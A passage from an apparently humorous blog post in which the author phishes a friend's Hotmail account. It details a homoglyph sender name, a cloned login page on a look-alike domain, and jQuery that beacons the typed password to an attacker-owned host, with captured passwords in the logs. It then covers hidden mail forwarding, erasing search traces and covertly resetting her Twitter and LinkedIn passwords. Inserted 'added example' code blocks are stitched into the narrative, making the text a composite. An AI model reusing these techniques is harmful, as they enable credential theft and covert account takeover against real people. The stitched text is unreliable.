<p>Instead of designing my own legit-looking Microsoft email, it’s easier to just copy one that Microsoft has already made. I search <em>my</em> hotmail account<sup id="fnref:myhotmail" role="doc-noteref"><a href="#fn:myhotmail" class="footnote" rel="footnote">14</a></sup> for an automated email from Microsoft.</p>
<p>I use the incredibly cutting edge “Inspect Element” feature of the popular hacking software, Google Chrome, to edit the text of the email but keep the look.
As I right click and hover over “Inspect Element”, my laptop instantly explodes, I get root access to Microsoft, I’m added 50 times to every NSA watchlist, my text permanently changes to green-on-black, and I’m accepted to DEFCON.</p>
<p>Now it looks like this:</p>
<p><img src="https://i.imgur.com/kv9nALW.png" alt="microphish" /></p>
<p>I can’t send the email from my email account, because I’m not a <em>total amateur</em>. I use the popular hacking tool The Microsoft Sign Up Screen to make the hotmail account “msftacountteam@outlook.com”. If you look closely, “account” is spelled wrong. I used “msft” because it wouldn’t let me include the word “microsoft”.</p>
<p>I try to register an account with first name “Microsoft” and last name “Account Team”. The signup form doesn’t let me. Blast. Thwarted by Microsoft lackeys. Probably, Microsoft doesn’t let you have “Microsoft” in your account name to prevent, uh, exactly what I’m doing. Hmmm. I don’t really want to have a typo in the name, like “Micorsoft”, since Diana might notice that.</p>
<p>Instead I, a level 8 Wizard, cast a spell to swap the “o” characters in “Microsoft” for a special unicode character (like an emoji but much worse) that looks exactly like an “o”. It’s not, of course, it’s our old friend, the Greek letter <a href="https://en.wikipedia.org/wiki/Omicron">“Omicron”</a>. Here’s the two pals side-by side:</p>
<p>οo</p>
<p>Awww, just look at ‘em having a blast.
These little guys might look different in the font your device is using, but in the hotmail web UI font they look juuuust right👌.</p>
<p>So now, my account’s name isn’t “Microsoft”, it’s “Micr<code class="language-plaintext highlighter-rouge">[omicron]</code>s<code class="language-plaintext highlighter-rouge">[omicron]</code>ft”, according to the code that checks whether you have a valid name when you sign up for an account.</p>
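<p>Here’s the omicron trick in code, next to the check the signup form <em>should</em> have run. This is an added example, not code from the post or from Microsoft: the confusables table is a hand-picked handful of Greek and Cyrillic look-alikes (an assumption for the example, not the full Unicode confusables list), and <code>checkDisplayName</code> is a hypothetical signup check. The point worth knowing is that Unicode normalisation on its own (NFKC) leaves omicron as omicron, so a form needs either a mixed-script check or a confusables fold to catch “Micr[omicron]s[omicron]ft”.</p>

```javascript
// Added example, not the post's code: the omicron trick from the post, and the check a signup
// form needs to catch it. U+03BF is GREEK SMALL LETTER OMICRON; the Cyrillic entries are other
// common look-alikes. The table is a hand-picked subset (assumed for this example), not the
// full Unicode confusables data.
const CONFUSABLES = {
  '\u03BF': 'o', // Greek small letter omicron
  '\u043E': 'o', // Cyrillic small letter o
  '\u0430': 'a', // Cyrillic small letter a
  '\u0435': 'e', // Cyrillic small letter ie
  '\u0440': 'p', // Cyrillic small letter er
  '\u0441': 'c', // Cyrillic small letter es
  '\u0456': 'i', // Cyrillic small letter byelorussian-ukrainian i
};

// The attacker's move: every Latin "o" becomes an omicron that renders identically in most
// fonts, so a naive equality check against "Microsoft" passes.
function omicronify(name) {
  return name.replace(/o/g, '\u03BF');
}

// Check 1: mixed scripts. A brand written in Latin letters should never contain Greek or
// Cyrillic code points; spaces and punctuation are Script=Common and don't count either way.
function isMixedScript(s) {
  const hasLatin = /\p{Script=Latin}/u.test(s);
  const hasGreekOrCyrillic = /[\p{Script=Greek}\p{Script=Cyrillic}]/u.test(s);
  return hasLatin && hasGreekOrCyrillic;
}

// Check 2: fold look-alikes back to ASCII before comparing, in the spirit of the UTS #39
// "skeleton". NFKC alone is not enough: it leaves omicron as omicron.
function skeleton(s) {
  return Array.from(s.normalize('NFKC'))
    .map(ch => CONFUSABLES[ch] || ch)
    .join('')
    .toLowerCase();
}

// Hypothetical signup-form check: returns a rejection reason, or null if the name is fine.
function checkDisplayName(displayName, blockedBrands = ['microsoft']) {
  if (isMixedScript(displayName)) return 'mixed-script';
  const folded = skeleton(displayName);
  const hit = blockedBrands.find(brand => folded.includes(brand));
  return hit ? 'impersonates:' + hit : null;
}
```

<p>Runs under Node 10 or newer (the regexes use Unicode property escapes). <code>checkDisplayName(omicronify('Microsoft'))</code> comes back <code>'mixed-script'</code>, the plain name comes back <code>'impersonates:microsoft'</code>, and “Kathleen Wheeler” sails through.</p>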
<p>I’m sure you’re wondering how this whole process ends up with me getting Diana’s password, laughing manically in my comically giant leather chair. After she clicks the link in my legit looking email, she’ll be asked to log in<sup id="fnref:loggedin" role="doc-noteref"><a href="#fn:loggedin" class="footnote" rel="footnote">15</a></sup>. The page she goes to will look just like the Hotmail login page, but it will <em>really</em> be a copy that sends the password to me.</p>
<p>How can I make such a page? Well I’ll clone the real page, register a domain that looks similar to <code class="language-plaintext highlighter-rouge">login.live.com</code>, host my cloned page there, and so on.
Juuust kidding, the static website hosting service <a href="https://aerobatic.io">Aerobatic</a> happens to also be an <em>excellent</em> phishing service.</p>
<p>I can register <code class="language-plaintext highlighter-rouge">[anything].aerobatic.io</code>, and deploy my static HTML to that domain with their command line tool for free.</p>
<p>Shout outs to Aerobatic for the smooth smooth phishing UX. Use the referral code DIANA to be immediately reported to the NSA.</p>
<p>I copy the existing <code class="language-plaintext highlighter-rouge">login.live.com</code> page, and pre-fill <code class="language-plaintext highlighter-rouge">dianalastname@hotmail.com</code> in the “email address” field. I deploy this page extremely trivially to <code class="language-plaintext highlighter-rouge">login-live.aerobatic.io</code>, and equip my fourth pair of sunglasses (don’t worry I’ve earned it). This <em>almost</em> looks right, but the real Hotmail login form has a bunch of stuff after the <code class="language-plaintext highlighter-rouge">/</code> in the URL, so I copy/paste some of that good stuff too<sup id="fnref:goodstuff" role="doc-noteref"><a href="#fn:goodstuff" class="footnote" rel="footnote">16</a></sup>.</p>
<p>Here’s the exact URL, if you’re interested. Also if you’re not interested. It’s gonna be there either way.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://login-live.aerobatic.io/?passive=1209600&continue=https%3A%2F%2Faccounts.live.com%2FManageAccount&followup=https%3A%2F%2Faccounts.live.com%2FManageAccount&flowName=GlifWebSignIn&flowEntry=ServiceLogin
</code></pre></div></div>
<p><img src="https://i.imgur.com/aZJoeYA.png" alt="Screenshot of login page" /></p>
<p>Perfect<sup id="fnref:loginscreen" role="doc-noteref"><a href="#fn:loginscreen" class="footnote" rel="footnote">17</a></sup>. This looks similar enough to fool a cursory glance, and that’s all we need baybee. Maybe she’ll think “why do I have to log in again? I’m already logged in to my email?”, but the email asks for a “Secure Login” (whatever that is).</p>
<p>Here’s what the login page does:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// When the Login button is clicked or Enter is pressed
$('#passwordForm').on('submit', function() {
var password = $('#password').val();
// Create an image with a URL that points to my website.
// The browser will request this URL in an attempt to load the image (which will fail since that URL doesn't exist)
$('body').append('<img src="a-website-i-own.com/DIANA?'%20+%20password%20+%20'" alt="image">');
// Wait one second to simulate loading time (adjust to 0.1s if you don't live in Australia sigh), and then go to the real Hotmail login page.
// Diana will already be logged in, so this will seem to her exactly like she's just logged in to hotmail.
window.setTimeout(function() {
window.location = 'login.live.com'
}, 1000);
return false;
}
</code></pre></div></div>
<p>This works by sending her password to me when she clicks “log in”. The password is sent to a website of mine. Then I send her along to the real Hotmail, so it looks just like she logged in.
The website logs everything that gets sent to it, so I can then search my logs for “DIANA” to find the log line containing the password.</p>
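<p>Since the beacon is just a GET whose query string <em>is</em> the password, “search my logs” is a one-line grep. As an added example (not the post’s own code), here is the same thing done properly: a parser for the combined access-log format the post’s log lines are in, the attacker’s extraction step, and the defender’s view of the very same line. On a server <em>you</em> run, a run of 404 GETs carrying a non-empty query string from a Referer that merely <em>resembles</em> <code>login.live.com</code> is the fingerprint of this kind of credential beacon. The log lines, IP addresses, user agents and the <code>p&amp;ss#word</code> password are constructed for the example; only the tag <code>DIANA</code> and the look-alike hostname come from the post, and the look-alike heuristic is a crude assumption, not a product rule.</p>

```javascript
// Added example, not the post's code: a parser for the "combined" access-log format the post's
// log lines are in, the attacker's "search my logs for DIANA" step, and the defender's view of
// the same line. The log lines below are constructed for this example (RFC 5737 test IPs,
// made-up user agents); only the tag "DIANA" and the look-alike hostname come from the post.
const SAMPLE_LOG = [
  '203.0.113.7 - - [12/May/2017:13:39:43 +1000] "GET /DIANA?wertyu2 HTTP/1.1" 404 4702 "https://docs-login-live.aerobatic.io/?passive=1209600" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X)"',
  '203.0.113.7 - - [12/May/2017:13:40:01 +1000] "GET /DIANA?wertyu2 HTTP/1.1" 404 4702 "https://docs-login-live.aerobatic.io/?passive=1209600" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X)"',
  '198.51.100.4 - - [12/May/2017:13:41:15 +1000] "GET /favicon.ico HTTP/1.1" 404 4702 "-" "curl/7.52.1"',
  '198.51.100.9 - - [12/May/2017:13:42:00 +1000] "GET /DIANA?p%26ss%23word HTTP/1.1" 404 4702 "https://login.live.com/" "Mozilla/5.0"',
];

// ip ident user [time] "method target protocol" status bytes "referer" "user-agent"
const COMBINED_LINE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (?:\d+|-) "([^"]*)" "([^"]*)"$/;

function parseCombinedLogLine(line) {
  const m = COMBINED_LINE.exec(line);
  if (!m) return null;
  const [, ip, time, method, target, status, referer, userAgent] = m;
  const q = target.indexOf('?');
  return {
    ip,
    time,
    method,
    path: q === -1 ? target : target.slice(0, q),
    query: q === -1 ? '' : target.slice(q + 1),
    status: Number(status),
    referer,
    userAgent,
  };
}

function hostnameOf(url) {
  try { return new URL(url).hostname; } catch (e) { return ''; } // "-" or garbage
}

function safeDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; } // malformed %-escapes stay raw
}

// Attacker side: every GET /<tag>?<value> is one submitted password. The value is URL-decoded
// because the capture page encodes it, so a password containing "&" or "#" survives the trip.
function extractBeacons(lines, tag) {
  const hits = [];
  for (const line of lines) {
    const rec = parseCombinedLogLine(line);
    if (!rec || rec.method !== 'GET' || rec.path !== '/' + tag || rec.query === '') continue;
    hits.push({ ip: rec.ip, time: rec.time, secret: safeDecode(rec.query), refererHost: hostnameOf(rec.referer) });
  }
  return hits;
}

// Defender side, for a server you run: a 404 GET that carries a query string and arrives from a
// Referer that merely resembles a real login host (every label bar the TLD appears in the
// referring hostname, but it is not that host) is the fingerprint of this kind of beacon.
// Crude heuristic, assumed for this example.
function looksLikeCredentialBeacon(rec, realLoginHosts = ['login.live.com']) {
  if (!rec || rec.method !== 'GET' || rec.status !== 404 || rec.query === '') return false;
  const host = hostnameOf(rec.referer).toLowerCase();
  if (host === '' || realLoginHosts.includes(host)) return false;
  return realLoginHosts.some(real => real.split('.').slice(0, -1).every(label => host.includes(label)));
}
```

<p>Run under Node: <code>extractBeacons(SAMPLE_LOG, 'DIANA')</code> gives three hits (the same password twice, then the one with the awkward characters), and <code>looksLikeCredentialBeacon</code> flags the first line but not the favicon probe or the line whose Referer really is <code>login.live.com</code>.</p>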
<p>This is all what I’m hoping for, anyway. The email says she has 48 hours to comply to create time pressure. Telling you that you have to do something <em>right now</em> is a common tactic to make you think instinctively and irrationally.</p>
<p>I login to my fake “Microsoft Account Team” hotmail account, send the email to dianalastname@hotmail.com and wait for her to have herself a red-hot browse.</p>
<p>About 12 hours later, I check my logs to see if she’s typed her password.</p>
<p>She doesn’t.</p>
<p>I wait another 12 hours.</p>
<p>Still nothing.</p>
<p>I send the email again, wincing slightly, this time saying she has 24 hours.</p>
<p>Still nothing.</p>
<h2 id="well-damn">Well damn</h2>
<p>I guess that didn’t work.
She must have just ignored the email as uninteresting<sup id="fnref:attention" role="doc-noteref"><a href="#fn:attention" class="footnote" rel="footnote">18</a></sup>.</p>
<p>I try to think of non-phishing ways to get her password but really phishing is just <em>too good</em>. The nice thing about being the attacker is that you can put your eggs in many baskets. Diana has to defend against <em>all</em> of my eggs, and I’ve got baskets <em>for days</em>. Time for round 2.</p>
<h2 id="sniper-scope-targeted-phishing-blap-blap">Sniper scope targeted phishing blap blap</h2>
<p>I reach under my desk, unwrap a parcel addressed to “DIRECTOR OF CYBER, NSA”, slide out a yellow and black canister labelled “CHINA”, break open the safety seal, and use safety tongs to extract the following red-hot phish.</p>
<p>This time, instead of using a generic idea that would work on anyone (“suspicious account activity”), we’ll make something special just for Diana. Kinda like hand-knitting a beanie, but comparatively less wholesome.</p>
<p>I Google “google docs microsoft equivalent” and come across I dunno SkyDrive or SkyDocs 365 Pro or something or OneDrive look I dunno just look it’s Google Docs but Microsoft so good enough for me.</p>
<p>I make a convincing looking resume (in Google Docs, of course) and copy it into a OneSkyCloudDrive 364/2 Days: Final Remix HD+ Doc.</p>
<h2 id="lets-play-whos-gonna-send-this-doc-to-diana">Let’s play: who’s gonna send this doc to Diana?</h2>
<p>I find a local company that’s likely to legitimately want to talk to Diana, and search LinkedIn for a recruiter who works there. I make up someone with the same first name as that real recruiter, but a different last name<sup id="fnref:lookupthecompany" role="doc-noteref"><a href="#fn:lookupthecompany" class="footnote" rel="footnote">19</a></sup>.</p>
<p>I make a fake gmail account called Kathleen Wheeler, using a stock photo of a middle-aged western woman as the profile photo.</p>
<p>Here’s what Kathleen is going to email Diana.</p>
<p><img src="https://i.imgur.com/McUFzCO.png" alt="email screenshot" /></p>
<p>Looks legit riiiight?</p>
<p>The questions at the end are just some garbage I made up, but the point of them is to distract Diana right after she reads the “click here”.</p>
<p>I put Diana’s real phone number at the end to make it more convincing. This email is obviously meant <em>just</em> for her. It also makes sense for the phone number to be there, since presumably whoever listed Diana as a referee gave the phone number to Kathleen.</p>
<p>At the time she types her password, we want Diana to be thinking of what’s on the other side of the login screen.</p>
<p>The delicious bait here is that this email says “someone said they know you”, and you have to read the resume to find out who. Aw, but the resume is behind a pesky link. ~<em>Guess you better just click on it</em>~. LinkedIn also does this in their, um, “engagement” emails which say things like “you have 2 new messages”, but not who they’re from or what they say.</p>
<p>When Diana clicks on the link to the “resume”, it will take her to the same fake login page (with her email pre-filled) as before. When she types anything in the password box, the site will wait one second and then send her to the Microsoft Google Doc™. The one-second wait is to simulate Australian internet speeds HAHAHAHAhahahahahah this sucks</p>
<p>She’ll find that she doesn’t know the person, probably because they’re completely made up. They have work experience at real workplaces nearby, and went to the same university as Diana at around the same time, so hopefully their resume passes a cursory glance<sup id="fnref:glance" role="doc-noteref"><a href="#fn:glance" class="footnote" rel="footnote">20</a></sup>.</p>
<p>Finding an unfamiliar resume is a sufficient, but not particularly satisfying conclusion to the adventure of the weird email from Kathleen. But of course, by then it’s too late, I’m sitting in my ivory tower <em>surrounded</em> by passwords.</p>
<p>I make sure to send it during business hours, from “Kathleen”””, pull a necklace from under my shirt dramatically, kiss it, look up at the sky, and wait.</p>
<h2 id="waiting">Waiting</h2>
<p>That night, I check my website’s logs for any passwords from my fake Hotmail login form.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>- - [[date]:16:32:30 +1000] "GET /DIANA?qwerty1 HTTP/1.1" 404 4702 "https://login-live.aerobatic.io/?passive=1209600&continue=https%3A%2F%2Faccounts.live.com%2FManageAccount&followup=http...." "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1"
</code></pre></div></div>
<p>“Got it!”</p>
<p>….. is what I think, at first.</p>
<p>Particularly keen readers will have noticed that the password Diana has typed into my fake Hotmail login page is… the same password as we found for her in the Tumblr database.</p>
<p>This is <em>not</em> her Hotmail password, and everything is terrible.</p>
<p>From this we can draw two conclusions:</p>
<ul>
<li>Diana <strong>doesn’t know</strong> what her Hotmail password is</li>
<li>She now <em>thinks</em> her hotmail password is <code class="language-plaintext highlighter-rouge">qwerty1</code>, since she typed it into my fake login page which accepts <em>any password</em>, and it worked</li>
</ul>
<p>I almost gave up at this point, but a last-minute burst of desperation/frustration/final destination helped me work up the courage to have another shot here in Act 3.</p>
<p>By this point my fake Microsoft Account Team email account has been soft-banned by the good people at William Gates Inc. for sending so many obvious phishing emails. I have to prove I’m a human and add my phone number to the account, and then it unlocks and I can edit the Microsoft Google Doc.</p>
<p>I <em>hastily</em> make a new fake resume of <em>significantly</em> lower quality than the first one, and make a crucial change to my fake login page.</p>
<p>My fake login page now says “wrong password” <em>no matter what</em> you type in the first two times you try typing something. If you type <code class="language-plaintext highlighter-rouge">qwerty1</code>, then the password counter doesn’t go up<sup id="fnref:suggestion" role="doc-noteref"><a href="#fn:suggestion" class="footnote" rel="footnote">21</a></sup>.</p>
<p>What do people do when they get a “wrong password” error? Try <em>all</em> of the 3 or 4 passwords they use for everything, of course.</p>
<p>I want to try and get Diana to type <code class="language-plaintext highlighter-rouge">qwerty1</code>, get a “wrong password” error, and then just unload all her passwords into my form.</p>
<p>Diana replied to my failed email with “sorry I don’t know this person”, and so Kathleen replies with, “wrong resume lol, here’s the new one” even though this makes zero sense in the context of our email exchange. I’m hoping Diana will just be busily checking the email on her phone and not really notice this discrepancy.</p>
<p><img src="https://i.imgur.com/H6QEW3d.png" alt="Dianareply1" /></p>
<p><img src="https://i.imgur.com/H8TlvtC.png" alt="oopswrongresume" /></p>
<p>I use a different font from the “form” when typing as Kathleen to make it look like this is a form that gets copy/pasted to every candidate. This makes Kathleen seem like she does this all the time in her big bustling, 100% real office. I also do my best to imitate the tone of a polite but stressed out office worker. You can almost <em>hear</em> the office politics. It’s called <em>method acting</em>.</p>
<p>Time to stressfully wait for Diana to check for her email again, so now would be a good time to read out some donations.</p>
<h2 id="hours-later">Hours later</h2>
<p>It works.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
108.162.249.169 - - [12/May/2017:13:39:43 +1000] "GET /DIANA?wertyu2 HTTP/1.1" 404 4702
"https://docs-login-live.aerobatic.io/?passive=1209600&continue=https%3A%2F%2Faccounts.live.com%2FManageAccount&followup=https%3A%2F%2Faccounts.live.com%2FManageAccount&flowName=GlifWebSignIn&flowEntry=ServiceLogin"
"Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1"
</code></pre></div></div>
<p>I get only one password from Diana (typed multiple times), but it’s different to the last one I got (<code class="language-plaintext highlighter-rouge">qwerty1</code>)<sup id="fnref:gaslighted" role="doc-noteref"><a href="#fn:gaslighted" class="footnote" rel="footnote">22</a></sup>.</p>
<p>I wait until she’s asleep based on her <a href="https://defaultnamehere.tumblr.com/post/139351766005/graphing-when-your-facebook-friends-are-awake">Facebook Messenger last active time</a> and log into her email using the elite hacking method of typing her password into the box.</p>
<p>The reason I waited until she was asleep was in case Hotmail emailed the account saying “New Sign In”. It doesn’t, and I’m rewarded with her email inbox screen in its full glory.</p>
<p><img src="https://i.imgur.com/BIfr6BE.png" alt="emailscreenshot" /></p>
<p>Angels sing softly above me. A small yellow bird lands on my shoulder and begins to chirp softly. I get several emails from the bullies in high school - they’re really sorry and they’ve done a lot of soul searching and they want to make it up to me and I should expect premium fruit baskets on my doorstep in the coming months. Global warming halts.</p>
<h2 id="but-that-would-never-work-on-me">“But that would never work on me”</h2>
<p>It would tho.</p>
<p>Perhaps some of you in the audience are thinking “Wow, this Diana person must be pretty dumb to fall for that. Good thing I’m a web browsing <em>prodigy</em> with a colossal brain and many opinions, so that would never happen to me.”</p>
<p>The thing is, right now you’re very alert, because you’re reading a blog post about hacking. If you were just reading your email, half-paying-attention on a train as normal, security probably wouldn’t be on your mind. If sending trick emails is good enough for whoever <a href="https://www.washingtonpost.com/world/hospitals-across-england-report-it-failure-amid-suspected-major-cyber-attack/2017/05/12/84e3dc5e-3723-11e7-b373-418f6849a004_story.html">the NSA</a> are emailing, then it’s probably good enough to work on you and me.</p>
<p>I guess what I’m saying here is “don’t go shaming phishing victims plz”.</p>
<p>Anyway sorry back to <strong>haͅck͐i̥n̏g̜</strong></p>
<h1 id="part-4-hacker-voice-im-in">Part 4: HACKER VOICE I’M IN</h1>
<p>I immediately try Diana’s email password (<code class="language-plaintext highlighter-rouge">wertyu2</code>) on her Facebook, Twitter, LinkedIn, iCloud, and on her other email addresses. None of them work because I’ve chosen someone with <em>slightly</em> above average personal security to target.</p>
<p>The obvious next step is to forward all her email to me (so I don’t have to keep logging in to her email). Before I set up email forwarding, I try it out on a hotmail account I control. I’m testing to see if setting up “forward all your email to this address” sets off any notifications I’ll have to delete, or notifies you in any other way.</p>
<p>In gmail, when you forward all your mail to another email address, the other address gets emailed a code, and also a big red bar appears on your gmail inbox saying “you’re sending literally all of your email to this address FYI” for 7 days.</p>
<p>I type in my email address into my test hotmail account, and click “forward all my mail here pls”. It saves. I check both email inboxes for a notification email. There isn’t one. I’ve just backdoored this email account and no fuss has been made whatsoever. OH well at least hotmail has NoMansSkyDrive 2.8 Remastered XL Online or whatever.</p>
<p><img src="https://i.imgur.com/aZJoeYA.png" alt="emailforwarding" /></p>
<h2 id="an-interlude-from-diana">An interlude from Diana</h2>
<p>Diana replies to my email saying she doesn’t know this person either. She’s a little suspicious, so I try and say something that will close the conversation.</p>
<p><img src="https://i.imgur.com/dO95Qmp.png" alt="dianasuspicious" />
<img src="https://i.imgur.com/dq6xzfl.png" alt="kathreply2" /></p>
<p>Diana doesn’t reply.</p>
<h2 id="hey-remember-how-you-can-search-email">Hey remember how you can search email?</h2>
<p>Now that I have Diana’s email password, I want to search her email for more passwords, and use those passwords to get more, and so on, like a REAL hacker.</p>
<p>Try going to your email and searching for “password”. Betcha there’s passwords in there.</p>
<p>In Hotmail, when you go to search something, the last 5 searches you’ve done pop up as suggestions.</p>
<p><img src="https://i.imgur.com/pGuxFuj.png" alt="searchhistory" /></p>
<p>This means that if I search for “password”, Diana will notice “password” in the search history. That would be a really lame way to get caught.</p>
<p>To get around this, I:</p>
<ul>
<li>Wait until Diana is asleep</li>
<li>Write down her last 5 searches</li>
<li>Search for “password”</li>
<li>Look at the results</li>
<li>Search for her last 5 searches again, in reverse order</li>
</ul>
<p>Since <em>only</em> the last 5 searches are shown, by repeating the searches in reverse order, the search history looks exactly the same.</p>
<p>Much to the disappointment of the live studio audience, I don’t find anything particularly useful. I find the two passwords I already know (<code class="language-plaintext highlighter-rouge">qwerty1</code> and <code class="language-plaintext highlighter-rouge">wertyu2</code>) several times, and one other password which I again try on all her accounts, but it doesn’t work <code class="language-plaintext highlighter-rouge">&lt;/3</code>.</p>
<p>I hang out in Diana’s email for several months. Every so often I check it.
I find her signing a contract for a job, and so I get her passport number, signature, phone number, bank account number, and basically everything I’d need to impersonate her. I don’t really<sup id="fnref:gov1" role="doc-noteref"><a href="#fn:gov1" class="footnote" rel="footnote">23</a></sup><sup id="fnref:gov2" role="doc-noteref"><a href="#fn:gov2" class="footnote" rel="footnote">24</a></sup><sup id="fnref:gov3" role="doc-noteref"><a href="#fn:gov3" class="footnote" rel="footnote">25</a></sup> want to impersonate someone’s government-issued ID, so I leave this alone.</p>
<p>At one stage, I’m browsing through hit political discourse platform and opinion conveyor belt twitter dot com, and I notice Diana tweet something along the lines of “Finally spent my day off consolidating my 4 email accounts into 1, feels good to be organised”.</p>
<p>I panic a little. Have I been found out? I log in to <code class="language-plaintext highlighter-rouge">dianalastname@hotmail.com</code> (which still works, thankfully) and see that all her emails have been archived. I poke around in the email forwarding settings, and I see that things have changed. Her email is no longer being sent to my email address, it’s being sent to <code class="language-plaintext highlighter-rouge">dianalastname42@gmail.com</code> (presumably the new email that Diana now forwards all her mail to).</p>
<p>This raises an important question. How did Diana not notice my email address in the “forward all mail to:” box? Did she see it, and just mindlessly delete it?</p>
<p>(When I interview her after all this, she says yes, that’s exactly what she did.)</p>
<h2 id="what-now">What now?</h2>
<p>Normally it would end here. Mission accomplished. I’m in control of her email. I could cause catastrophic damage to Diana’s life if I wanted to (I don’t btw). There’s potential for endless gags, limitless goofs, unlimited japes, infinite jests, etc.</p>
<p>But.. it seems like an awful shame to just… leave. That’s why I start work on a little somethin’ called</p>
<h2 id="operation-luigi">Operation Luigi</h2>
<p><em>Everybody just LOVES Mario’s green friend Luigi! He’s a Certified Good Boy! Just look at that boyish charm.</em></p>
<p><img src="https://sickr.files.wordpress.com/2013/06/luigi-circle.jpg" alt="a good boy" /></p>
<p><em>Why not brighten up YOUR social media presence with this game boy?</em></p>
<p>Well gee I’m sold after that delightful interlude from our sponsor, The Nintendo. Let’s get Diana some uncut, Colombian Luigi.</p>
<h3 id="step-1-get-in-to-her-twitter-and-linkedin">Step 1: Get in to her Twitter and LinkedIn</h3>
<p>So, I want to:</p>
<ul>
<li>Get access to Diana’s Twitter</li>
<li><em>Not</em> lock Diana out</li>
<li><em>Not</em> alert Diana that I’m up in her stuff</li>
</ul>
<p>I could just phish her again for these passwords, but I’m already a salty old fisherman by this point.</p>
<p>Since I have access to her email, I could reset her Twitter password.
The problem is, when you reset your Twitter password, you get logged out of Twitter in Chrome, the Twitter app, and anywhere else you might be logged in. So you have to retype your new password. One of my rules was that I wouldn’t interrupt Diana’s life, so I need her to be able to log back in to Twitter when I force her to log out.</p>
<p>I come up with a simple 8-step plan to do this, with 4 easy repayments of 2 steps.</p>
<ol>
<li>Wait until Diana is asleep</li>
<li>Disable Diana’s email forwarding</li>
<li>Go to Twitter and reset her password</li>
<li>Click the password reset link that gets emailed to her</li>
<li><strong>Set her password to <code class="language-plaintext highlighter-rouge">qwerty1</code></strong></li>
<li>Delete the password reset email</li>
<li>Delete the “New Twitter Sign In” email</li>
<li>Re-enable email forwarding</li>
</ol>
<p>The combo move in this is setting her password to <code class="language-plaintext highlighter-rouge">qwerty1</code>. When I phished her email password, she tried to log in to her email with <code class="language-plaintext highlighter-rouge">qwerty1</code> <em>even though that’s not her password</em>. This tells me that she <em>thinks</em> her password for everything is <code class="language-plaintext highlighter-rouge">qwerty1</code>, or at least, that’s what she’ll try if she’s not sure. The technical term for this is <em>next-level mindgames</em>💻💻💻.</p>
<p>I do the steps above, and I’m now logged in to Diana’s Twitter account. I tighten up her Twitter security settings because I’m a Good Boy.
I HOPE that Diana will be able to log back in as well, and not wonder why she suddenly got logged out. I wait stressfully for her to tweet something, and after a day or so she retweets a cute doggo, so we’re good to go.</p>
<p>Now I want to do the same thing on popular dating website LinkedIn. This will involve signing Diana out of LinkedIn on all her devices, and I don’t want her to get too suspicious, so I wait a week. I do the same process as with Twitter. This time I don’t even wait until Diana is asleep, because I’m young and invincible.</p>
<p>As I’m setting Diana’s password on LinkedIn back to <code class="language-plaintext highlighter-rouge">qwerty1</code>, LinkedIn doesn’t let me.</p>
<p><img src="https://i.imgur.com/IpOA2iv.png" alt="moresecurepassword" /></p>
<p>Is this because <code class="language-plaintext highlighter-rouge">qwerty1</code> was a password present in the LinkedIn hack in 2012? Or because it’s just a common password?
For a brief moment I panic, but then I realise I can just set Diana’s password to her email password, <code class="language-plaintext highlighter-rouge">wertyu2</code>.</p>
<p>Astute readers will have noticed this little guy in the screenshot above.</p>
<p><img src="https://i.imgur.com/XYkmZAp.png" alt="littleguy" /></p>
<p>LinkedIn is asking me if I’d like to log out of Diana’s LinkedIn account on all devices while I’m resetting the password. That’s <em>REAL</em> nice of you to offer old mate LinkedIn but I’m absolutely <em>golden</em> as it is in terms of logouts so <em>don’t even worry about it</em> I’ll be just fine how it is <em>NO REALLY</em> don’t trouble yourself, I’m sure your CPU cycles are busy displaying everyone’s 6000 word <em>Thinkpieces</em> about “Cyber” for “Non-technical Business Decision Makers”.</p>
<p><img src="https://i.imgur.com/1oxZfKR.png" alt="zoomed" /></p>
<p>Yeah so I submit that form 100% checkbox-free, and Diana remains logged in to LinkedIn on all her devices, none the wiser.</p>
<h2 id="step-2-bring-in-the-green-boys">Step 2: Bring in the green boys</h2>
<p>I enlist the help of a talented friend to photoshop everyone’s #1 boy next door Luigi subtly into Diana’s profile picture on Twitter, like a green guardian angel.</p>
<p>I can’t show you Diana’s pictures, so here’s me doing similar photoshops to Your Boy And Mine, Five Time Celebrity MasterChef Winner And The Inventor of Bitcoin, Give It Up For Dr. Barack Obama Everybody:</p>
<p><img src="https://i.imgur.com/00gDWzz.png" alt="obama1" />
<img src="https://i.imgur.com/RyiWH2b.png" alt="obama2" /></p>
<p>At about this time I <a href="https://twitter.com/mangopdf/status/883633939054706688">tweet</a> about our sweet green boy so that if Diana sees her guardian angel Luigi, she’ll know it was me. This is like my calling card except…. well it’s not <em>really</em> like a calling card it’s pretty dorky to be honest but just LOOK at that wholesome lad, you just <em>KNOW</em> he’d help you fix a flat tyre, and he’d just be too gosh darn polite to correct you if you said “thanks green mario” so really if you think about it I guess it IS like a calling card.</p>
<p>Next up I log into her LinkedIn account, get overwhelmed by her 15 LinkedIn notifications, 7 new profile views, 11 new Key People To Bother, and several pop ups telling me about new features I can use to invite people to join my professional network on LinkedIn™®©. Then I change her profile picture to my really good version.</p>
<p>For about a week, Diana continues her Twitter and LinkedIn(?) usage whilst being silently Luigi’d.
Diana goes on viewing what I can only assume to be the sharpest international political discourse on Twitter, and getting slightly more LinkedIn profile views from observant recruiters who are also fans of the hit 2001 ghostbusting game, Luigi’s Mansion.</p>
<p>Well that just about wraps up Operation Luigi. Glad that’s all done and dusted.</p>
<p>Although…</p>
<p>I’m basically a Luigi <em>technician</em> at this point, and it would be a <em>shame</em> to let all that work go to waste. So let’s just do</p>
<p>~<em>one more thing</em>~</p>
<h2 id="operation-waluigi-a-dark-turn-for-mature-audiences">Operation Waluigi: A dark turn for mature audiences</h2>
<p>Waluigi, true to his character, is much more direct.</p>
<p><img src="https://i.imgur.com/nZpK7KG.png" alt="waluigilinkedin" /></p>
